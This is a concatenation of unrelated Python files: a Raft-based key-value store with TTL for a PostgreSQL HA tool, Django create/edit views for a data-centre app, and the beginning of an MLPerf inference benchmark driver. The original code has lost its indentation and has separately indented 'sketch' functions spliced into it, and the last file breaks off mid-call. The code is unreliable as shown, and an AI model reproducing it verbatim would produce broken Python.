rospy.spin()
|
raft.py
|
import json
import logging
import os
import threading
import time
from pysyncobj import SyncObj, SyncObjConf, replicated, FAIL_REASON
from pysyncobj.transport import TCPTransport, CONNECTION_STATE
from pysyncobj.utility import TcpUtility, UtilityException
from . import AbstractDCS, ClusterConfig, Cluster, Failover, Leader, Member, SyncState, TimelineHistory
from ..utils import validate_directory
logger = logging.getLogger(__name__)
class _TCPTransport(TCPTransport):
def __init__(self, syncObj, selfNode, otherNodes):
super(_TCPTransport, self).__init__(syncObj, selfNode, otherNodes)
self.setOnUtilityMessageCallback('members', syncObj.getMembers)
class SyncObjUtility(object):
def __init__(self, otherNodes, conf):
self._nodes = otherNodes
self._utility = TcpUtility(conf.password)
def executeCommand(self, command):
try:
return self._utility.executeCommand(self.__node, command)
except UtilityException:
return None
def getMembers(self):
for self.__node in self._nodes:
response = self.executeCommand(['members'])
if response:
return [member['addr'] for member in response]
class DynMemberSyncObj(SyncObj):
def __init__(self, selfAddress, partnerAddrs, conf):
self.__early_apply_local_log = selfAddress is not None
self.applied_local_log = False
utility = SyncObjUtility(partnerAddrs, conf)
members = utility.getMembers()
add_self = members and selfAddress not in members
partnerAddrs = [member for member in (members or partnerAddrs) if member != selfAddress]
super(DynMemberSyncObj, self).__init__(selfAddress, partnerAddrs, conf, transportClass=_TCPTransport)
if add_self:
thread = threading.Thread(target=utility.executeCommand, args=(['add', selfAddress],))
thread.daemon = True
thread.start()
def getMembers(self, args, callback):
callback([{'addr': node.id, 'leader': node == self._getLeader(), 'status': CONNECTION_STATE.CONNECTED
if self.isNodeConnected(node) else CONNECTION_STATE.DISCONNECTED} for node in self.otherNodes] +
[{'addr': self.selfNode.id, 'leader': self._isLeader(), 'status': CONNECTION_STATE.CONNECTED}], None)
def _onTick(self, timeToWait=0.0):
super(DynMemberSyncObj, self)._onTick(timeToWait)
# The SyncObj calls the onReady callback only when the cluster has a leader and is ready for writes.
# In some cases for us it is safe to "signal" the Raft object when the local log is fully applied.
# We are using the `applied_local_log` property for that, but not calling the callback function.
if self.__early_apply_local_log and not self.applied_local_log and self.raftLastApplied == self.raftCommitIndex:
self.applied_local_log = True
class KVStoreTTL(DynMemberSyncObj):
def __init__(self, on_ready, on_set, on_delete, **config):
self.__thread = None
self.__on_set = on_set
self.__on_delete = on_delete
self.__limb = {}
self.__retry_timeout = None
self_addr = config.get('self_addr')
partner_addrs = set(config.get('partner_addrs', []))
if config.get('patronictl'):
if self_addr:
partner_addrs.add(self_addr)
self_addr = None
# Create raft data_dir if necessary
raft_data_dir = config.get('data_dir', '')
if raft_data_dir != '':
validate_directory(raft_data_dir)
file_template = (self_addr or '')
file_template = file_template.replace(':', '_') if os.name == 'nt' else file_template
file_template = os.path.join(raft_data_dir, file_template)
conf = SyncObjConf(password=config.get('password'), autoTick=False, appendEntriesUseBatch=False,
bindAddress=config.get('bind_addr'), commandsWaitLeader=config.get('commandsWaitLeader'),
fullDumpFile=(file_template + '.dump' if self_addr else None),
journalFile=(file_template + '.journal' if self_addr else None),
onReady=on_ready, dynamicMembershipChange=True)
super(KVStoreTTL, self).__init__(self_addr, partner_addrs, conf)
self.__data = {}
@staticmethod
def __check_requirements(old_value, **kwargs):
return ('prevExist' not in kwargs or bool(kwargs['prevExist']) == bool(old_value)) and \
('prevValue' not in kwargs or old_value and old_value['value'] == kwargs['prevValue']) and \
(not kwargs.get('prevIndex') or old_value and old_value['index'] == kwargs['prevIndex'])
def set_retry_timeout(self, retry_timeout):
self.__retry_timeout = retry_timeout
def retry(self, func, *args, **kwargs):
event = threading.Event()
ret = {'result': None, 'error': -1}
def callback(result, error):
ret.update(result=result, error=error)
event.set()
kwargs['callback'] = callback
timeout = kwargs.pop('timeout', None) or self.__retry_timeout
deadline = timeout and time.time() + timeout
while True:
event.clear()
func(*args, **kwargs)
event.wait(timeout)
if ret['error'] == FAIL_REASON.SUCCESS:
return ret['result']
elif ret['error'] == FAIL_REASON.REQUEST_DENIED:
break
elif deadline:
timeout = deadline - time.time()
if timeout <= 0:
break
time.sleep(1)
return False
@replicated
def _set(self, key, value, **kwargs):
old_value = self.__data.get(key, {})
if not self.__check_requirements(old_value, **kwargs):
return False
if old_value and old_value['created'] != value['created']:
value['created'] = value['updated']
value['index'] = self.raftLastApplied + 1
self.__data[key] = value
if self.__on_set:
self.__on_set(key, value)
return True
def set(self, key, value, ttl=None, **kwargs):
old_value = self.__data.get(key, {})
if not self.__check_requirements(old_value, **kwargs):
return False
value = {'value': value, 'updated': time.time()}
value['created'] = old_value.get('created', value['updated'])
if ttl:
value['expire'] = value['updated'] + ttl
return self.retry(self._set, key, value, **kwargs)
def __pop(self, key):
self.__data.pop(key)
if self.__on_delete:
self.__on_delete(key)
@replicated
def _delete(self, key, recursive=False, **kwargs):
if recursive:
for k in list(self.__data.keys()):
if k.startswith(key):
self.__pop(k)
elif not self.__check_requirements(self.__data.get(key, {}), **kwargs):
return False
else:
self.__pop(key)
return True
def delete(self, key, recursive=False, **kwargs):
if not recursive and not self.__check_requirements(self.__data.get(key, {}), **kwargs):
return False
return self.retry(self._delete, key, recursive=recursive, **kwargs)
@staticmethod
def __values_match(old, new):
return all(old.get(n) == new.get(n) for n in ('created', 'updated', 'expire', 'value'))
@replicated
def _expire(self, key, value, callback=None):
current = self.__data.get(key)
if current and self.__values_match(current, value):
self.__pop(key)
def __expire_keys(self):
for key, value in self.__data.items():
if value and 'expire' in value and value['expire'] <= time.time() and \
not (key in self.__limb and self.__values_match(self.__limb[key], value)):
self.__limb[key] = value
def callback(*args):
if key in self.__limb and self.__values_match(self.__limb[key], value):
self.__limb.pop(key)
self._expire(key, value, callback=callback)
def get(self, key, recursive=False):
if not recursive:
return self.__data.get(key)
return {k: v for k, v in self.__data.items() if k.startswith(key)}
def _onTick(self, timeToWait=0.0):
super(KVStoreTTL, self)._onTick(timeToWait)
if self._isLeader():
self.__expire_keys()
else:
self.__limb.clear()
def _autoTickThread(self):
self.__destroying = False
while not self.__destroying:
self.doTick(self.conf.autoTickPeriod)
def startAutoTick(self):
self.__thread = threading.Thread(target=self._autoTickThread)
self.__thread.daemon = True
self.__thread.start()
def destroy(self):
if self.__thread:
self.__destroying = True
self.__thread.join()
super(KVStoreTTL, self).destroy()
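# ---------------------------------------------------------------------------
# Hedged sketch (illustration only, not the pysyncobj API): KVStoreTTL guards
# writes and deletes with etcd-style preconditions in __check_requirements
# (prevExist, prevValue, prevIndex). The standalone function below mirrors
# that logic on a plain dict so the semantics can be tried without a running
# raft cluster; _cas_sketch, check_preconditions and store are invented names.
def _cas_sketch():
    def check_preconditions(old_value, **kwargs):
        return ('prevExist' not in kwargs or bool(kwargs['prevExist']) == bool(old_value)) and \
            ('prevValue' not in kwargs or (old_value and old_value['value'] == kwargs['prevValue'])) and \
            (not kwargs.get('prevIndex') or (old_value and old_value['index'] == kwargs['prevIndex']))

    store = {'leader': {'value': 'node1', 'index': 7}}
    # create-only write fails because the key already exists
    print(bool(check_preconditions(store.get('leader', {}), prevExist=False)))  # False
    # update guarded by the expected current value succeeds
    print(bool(check_preconditions(store.get('leader', {}), prevValue='node1')))  # True
    # update guarded by a stale index fails
    print(bool(check_preconditions(store.get('leader', {}), prevIndex=3)))  # False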
class Raft(AbstractDCS):
def __init__(self, config):
super(Raft, self).__init__(config)
self._ttl = int(config.get('ttl') or 30)
ready_event = threading.Event()
self._sync_obj = KVStoreTTL(ready_event.set, self._on_set, self._on_delete, commandsWaitLeader=False, **config)
self._sync_obj.startAutoTick()
while True:
ready_event.wait(5)
if ready_event.is_set() or self._sync_obj.applied_local_log:
break
else:
logger.info('waiting on raft')
self.set_retry_timeout(int(config.get('retry_timeout') or 10))
def _on_set(self, key, value):
leader = (self._sync_obj.get(self.leader_path) or {}).get('value')
if value['created'] == value['updated'] and \
(key.startswith(self.members_path) or key == self.leader_path and leader != self._name) or \
key == self.leader_optime_path and leader != self._name or key in (self.config_path, self.sync_path):
self.event.set()
def _on_delete(self, key):
if key == self.leader_path:
self.event.set()
def set_ttl(self, ttl):
self._ttl = ttl
@property
def ttl(self):
return self._ttl
def set_retry_timeout(self, retry_timeout):
self._sync_obj.set_retry_timeout(retry_timeout)
@staticmethod
def member(key, value):
return Member.from_node(value['index'], os.path.basename(key), None, value['value'])
def _load_cluster(self):
prefix = self.client_path('')
response = self._sync_obj.get(prefix, recursive=True)
if not response:
return Cluster(None, None, None, None, [], None, None, None, None)
nodes = {os.path.relpath(key, prefix).replace('\\', '/'): value for key, value in response.items()}
# get initialize flag
initialize = nodes.get(self._INITIALIZE)
initialize = initialize and initialize['value']
# get global dynamic configuration
config = nodes.get(self._CONFIG)
config = config and ClusterConfig.from_node(config['index'], config['value'])
# get timeline history
history = nodes.get(self._HISTORY)
history = history and TimelineHistory.from_node(history['index'], history['value'])
# get last known leader lsn and slots
status = nodes.get(self._STATUS)
if status:
try:
status = json.loads(status['value'])
last_lsn = status.get(self._OPTIME)
slots = status.get('slots')
except Exception:
slots = last_lsn = None
else:
last_lsn = nodes.get(self._LEADER_OPTIME)
last_lsn = last_lsn and last_lsn['value']
slots = None
try:
last_lsn = int(last_lsn)
except Exception:
last_lsn = 0
# get list of members
members = [self.member(k, n) for k, n in nodes.items() if k.startswith(self._MEMBERS) and k.count('/') == 1]
# get leader
leader = nodes.get(self._LEADER)
if leader:
member = Member(-1, leader['value'], None, {})
member = ([m for m in members if m.name == leader['value']] or [member])[0]
leader = Leader(leader['index'], None, member)
# failover key
failover = nodes.get(self._FAILOVER)
if failover:
failover = Failover.from_node(failover['index'], failover['value'])
# get synchronization state
sync = nodes.get(self._SYNC)
sync = SyncState.from_node(sync and sync['index'], sync and sync['value'])
return Cluster(initialize, config, leader, last_lsn, members, failover, sync, history, slots)
def _write_leader_optime(self, last_lsn):
return self._sync_obj.set(self.leader_optime_path, last_lsn, timeout=1)
def _write_status(self, value):
return self._sync_obj.set(self.status_path, value, timeout=1)
def _update_leader(self):
ret = self._sync_obj.set(self.leader_path, self._name, ttl=self._ttl, prevValue=self._name)
if not ret and self._sync_obj.get(self.leader_path) is None:
ret = self.attempt_to_acquire_leader()
return ret
def attempt_to_acquire_leader(self, permanent=False):
return self._sync_obj.set(self.leader_path, self._name, prevExist=False,
ttl=None if permanent else self._ttl)
def set_failover_value(self, value, index=None):
return self._sync_obj.set(self.failover_path, value, prevIndex=index)
def set_config_value(self, value, index=None):
return self._sync_obj.set(self.config_path, value, prevIndex=index)
def touch_member(self, data, permanent=False):
data = json.dumps(data, separators=(',', ':'))
return self._sync_obj.set(self.member_path, data, None if permanent else self._ttl, timeout=2)
def take_leader(self):
return self._sync_obj.set(self.leader_path, self._name, ttl=self._ttl)
def initialize(self, create_new=True, sysid=''):
return self._sync_obj.set(self.initialize_path, sysid, prevExist=(not create_new))
def _delete_leader(self):
return self._sync_obj.delete(self.leader_path, prevValue=self._name, timeout=1)
def cancel_initialization(self):
return self._sync_obj.delete(self.initialize_path)
def delete_cluster(self):
return self._sync_obj.delete(self.client_path(''), recursive=True)
def set_history_value(self, value):
return self._sync_obj.set(self.history_path, value)
def set_sync_state_value(self, value, index=None):
return self._sync_obj.set(self.sync_path, value, prevIndex=index)
def delete_sync_state(self, index=None):
return self._sync_obj.delete(self.sync_path, prevIndex=index)
def watch(self, leader_index, timeout):
try:
return super(Raft, self).watch(leader_index, timeout)
finally:
self.event.clear()
|
edit.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
try:
import simplejson as json
except ImportError:
import json
from threading import Thread
from django.db import models
from django.http import JsonResponse
from django.contrib import messages
from django.forms.models import model_to_dict, construct_instance
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.utils.module_loading import import_string
from django.utils.encoding import force_text
from django.views.generic.edit import CreateView, UpdateView
# Create your views here.
from idcops.models import User
from idcops.mixins import BaseRequiredMixin, PostRedirect
from idcops.lib.utils import make_dict, diff_dict, get_content_type_for_model
from idcops.lib.tasks import log_action, device_post_save
class NewModelView(BaseRequiredMixin, PermissionRequiredMixin,
PostRedirect, SuccessMessageMixin, CreateView):
def get_template_names(self):
prefix = self.model_name
if self.request.is_ajax():
return ["{0}/ajax_new.html".format(prefix), "base/ajax_new.html"]
else:
return ["{0}/new.html".format(prefix), "base/new.html"]
def get_permission_required(self):
self.permission_required = 'idcops.add_%s' % (self.model_name)
return super(NewModelView, self).get_permission_required()
def handle_no_permission(self):
messages.error(self.request, "您没有新建 {0} 的权限.".format(
self.model._meta.verbose_name))
return super(NewModelView, self).handle_no_permission()
def get_success_message(self, cleaned_data):
self.success_message = "成功创建了 {} {}".format(
self.verbose_name, self.object
)
return self.success_message
def get_form_class(self):
name = self.model_name.capitalize()
try:
form_class_path = "idcops.forms.{}NewForm".format(name)
self.form_class = import_string(form_class_path)
except BaseException:
form_class_path = "idcops.forms.{}Form".format(name)
self.form_class = import_string(form_class_path)
return self.form_class
def get_form_kwargs(self):
kwargs = super(NewModelView, self).get_form_kwargs()
params = self.request.GET.dict()
mfields = [f.attname for f in self.opts.fields]
for k in params.keys():
if k in mfields:
kwargs.update({k: params[k]})
related_models = []
for f in self.opts.get_fields():
if isinstance(f, (models.ForeignKey, models.ManyToManyField)):
if f.related_model:
related_models.append(f.related_model)
if User in related_models:
kwargs.update({'user': self.request.user})
return kwargs
def form_valid(self, form):
form.instance.creator = self.request.user
if 'onidc' not in form.cleaned_data:
form.instance.onidc = self.request.user.onidc
response = super(NewModelView, self).form_valid(form)
log_action(
user_id=self.request.user.pk,
content_type_id=get_content_type_for_model(self.object, True).pk,
object_id=self.object.pk,
action_flag="新增"
)
if self.model_name == 'online':
verify = Thread(target=device_post_save, args=(self.object.pk,))
verify.start()
if self.request.is_ajax():
data = {
'message': "Successfully submitted form data.",
'data': form.cleaned_data
}
return JsonResponse(data)
else:
return response
def get_context_data(self, **kwargs):
context = super(NewModelView, self).get_context_data(**kwargs)
return context
class EditModelView(BaseRequiredMixin, PermissionRequiredMixin,
PostRedirect, SuccessMessageMixin, UpdateView):
def get_template_names(self):
prefix = self.model_name
if self.request.is_ajax():
return ["{0}/ajax_edit.html".format(prefix), "base/ajax_edit.html"]
else:
return ["{0}/edit.html".format(prefix), "base/edit.html"]
def get_permission_required(self):
self.permission_required = 'idcops.change_%s' % (self.model_name)
return super(EditModelView, self).get_permission_required()
def handle_no_permission(self):
messages.error(self.request, "您没有修改 {0} 的权限.".format(
self.model._meta.verbose_name))
return super(EditModelView, self).handle_no_permission()
def get_success_message(self, cleaned_data):
self.success_message = '成功修改了 {0} "{1}"'.format(
self.model._meta.verbose_name, force_text(self.object)
)
return self.success_message
def get_object(self):
return self.model.objects.get(pk=self.kwargs.get(self.pk_url_kwarg))
def get_form_class(self):
name = self.model_name.capitalize()
try:
form_class_path = "idcops.forms.{}EditForm".format(name)
self.form_class = import_string(form_class_path)
except BaseException:
form_class_path = "idcops.forms.{}Form".format(name)
self.form_class = import_string(form_class_path)
return self.form_class
def get_form_kwargs(self):
kwargs = super(EditModelView, self).get_form_kwargs()
params = self.request.GET.dict()
mfields = [f.attname for f in self.opts.fields]
for k in params.keys():
if k in mfields:
kwargs.update({k: params[k]})
related_models = []
for f in self.opts.get_fields():
if isinstance(f, (models.ForeignKey, models.ManyToManyField)):
if f.related_model:
related_models.append(f.related_model)
if User in related_models:
kwargs.update({'user': self.request.user})
return kwargs
def form_valid(self, form):
form.instance.operator = self.request.user
if 'onidc' not in form.cleaned_data:
form.instance.onidc = self.request.user.onidc
d1 = form.initial
message = json.dumps(form.changed_data)
response = super(EditModelView, self).form_valid(form)
d2 = model_to_dict(construct_instance(form, self.object))
diffs = diff_dict(make_dict(d1), make_dict(d2))
content = json.dumps(diffs)
log_action(
user_id=self.request.user.pk,
content_type_id=get_content_type_for_model(self.object, True).pk,
object_id=self.object.pk,
action_flag="修改", message=message, content=content
)
if self.model_name == 'online':
verify = Thread(target=device_post_save, args=(self.object.pk,))
verify.start()
if self.request.is_ajax():
data = {
'message': "Successfully submitted form data.",
'data': form.cleaned_data
}
return JsonResponse(data)
else:
return response
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3]}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3]}),
}
# pre-defined command line options to simplify things. They are used as defaults and can be
# overwritten from the command line
DEFAULT_LATENCY = "0.100"
LATENCY_RESNET50 = "0.015"
LATENCY_MOBILENET = "0.010"
LATENCY_SSD_MOBILENET = "0.010"
# FIXME: change once final value is known
LATENCY_SSD_RESNET34 = "0.100"
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"queries-single": 1024,
"queries-multi": 24576,
"max-latency": DEFAULT_LATENCY,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"max-latency": LATENCY_RESNET50,
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"max-latency": LATENCY_RESNET50,
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"max-latency": LATENCY_MOBILENET,
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"max-latency": LATENCY_MOBILENET,
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"max-latency": LATENCY_SSD_MOBILENET,
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"max-latency": LATENCY_SSD_MOBILENET,
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"max-latency": LATENCY_SSD_MOBILENET,
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"max-latency": LATENCY_SSD_RESNET34,
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"max-latency": LATENCY_SSD_RESNET34,
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"max-latency": LATENCY_SSD_RESNET34,
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"max-latency": LATENCY_SSD_RESNET34,
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, list of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--queries-single", type=int, default=1024,
help="mlperf number of queries for SingleStream")
parser.add_argument("--queries-offline", type=int, default=24576,
help="mlperf number of queries for Offline")
parser.add_argument("--queries-multi", type=int, default=24576,
help="mlperf number of queries for MultiStream,Server")
parser.add_argument("--max-batchsize", type=int,
help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--qps", type=int, default=10, help="target qps estimate")
parser.add_argument("--max-latency", type=str, help="mlperf max latency in 99pct tile")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
args = parser.parse_args()
# don't use defaults in argparse. Instead we default to a dict, override that with a profile
# and use the result as the defaults unless the command line gives a value
# (a standalone sketch of this pattern follows get_args)
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.max_latency:
args.max_latency = [float(i) for i in args.max_latency.split(",")]
try:
args.scenario = [SCENARIO_MAP[scenario] for scenario in args.scenario.split(",")]
except KeyError:
parser.error("valid scenarios: " + str(list(SCENARIO_MAP.keys())))
return args
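# ---------------------------------------------------------------------------
# Hedged sketch (illustration only, separate from get_args above): the comment
# in get_args describes layering defaults as dict -> profile -> command line
# instead of baking defaults into argparse. The self-contained toy below shows
# the same setattr-based override; _profile_defaults_sketch and toy_profiles
# are invented names for the example.
def _profile_defaults_sketch():
    import argparse
    toy_profiles = {
        "defaults": {"backend": "tensorflow", "max_batchsize": 32},
        "resnet50-tf": {"max_batchsize": 8},
    }
    parser = argparse.ArgumentParser()
    parser.add_argument("--profile")
    parser.add_argument("--backend")
    parser.add_argument("--max-batchsize", type=int)
    args = parser.parse_args(["--profile", "resnet50-tf"])
    defaults = dict(toy_profiles["defaults"])
    if args.profile:
        defaults.update(toy_profiles[args.profile])
    for k, v in defaults.items():
        dest = k.replace("-", "_")
        if getattr(args, dest) is None:
            setattr(args, dest, v)
    print(args.backend, args.max_batchsize)  # tensorflow 8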
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent wants us to exit (see the sentinel sketch after this class)
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
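# ---------------------------------------------------------------------------
# Hedged sketch (illustration only, not used by the benchmark): QueueRunner
# above stops its worker threads by pushing one None sentinel per worker and
# joining them. The toy below shows the same idiom with the standard library
# only; _sentinel_shutdown_sketch and toy_worker are invented names.
def _sentinel_shutdown_sketch():
    import queue
    import threading

    tasks = queue.Queue()
    results = []

    def toy_worker():
        while True:
            item = tasks.get()
            if item is None:  # sentinel: the parent wants us to exit
                tasks.task_done()
                break
            results.append(item * item)
            tasks.task_done()

    workers = [threading.Thread(target=toy_worker, daemon=True) for _ in range(2)]
    for w in workers:
        w.start()
    for n in range(5):
        tasks.put(n)
    for _ in workers:  # one sentinel per worker
        tasks.put(None)
    for w in workers:
        w.join()
    print(sorted(results))  # [0, 1, 4, 9, 16]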
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For performance mode we always limit count to 200.
count = args.count
if not count:
if not args.accuracy:
count = 200
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
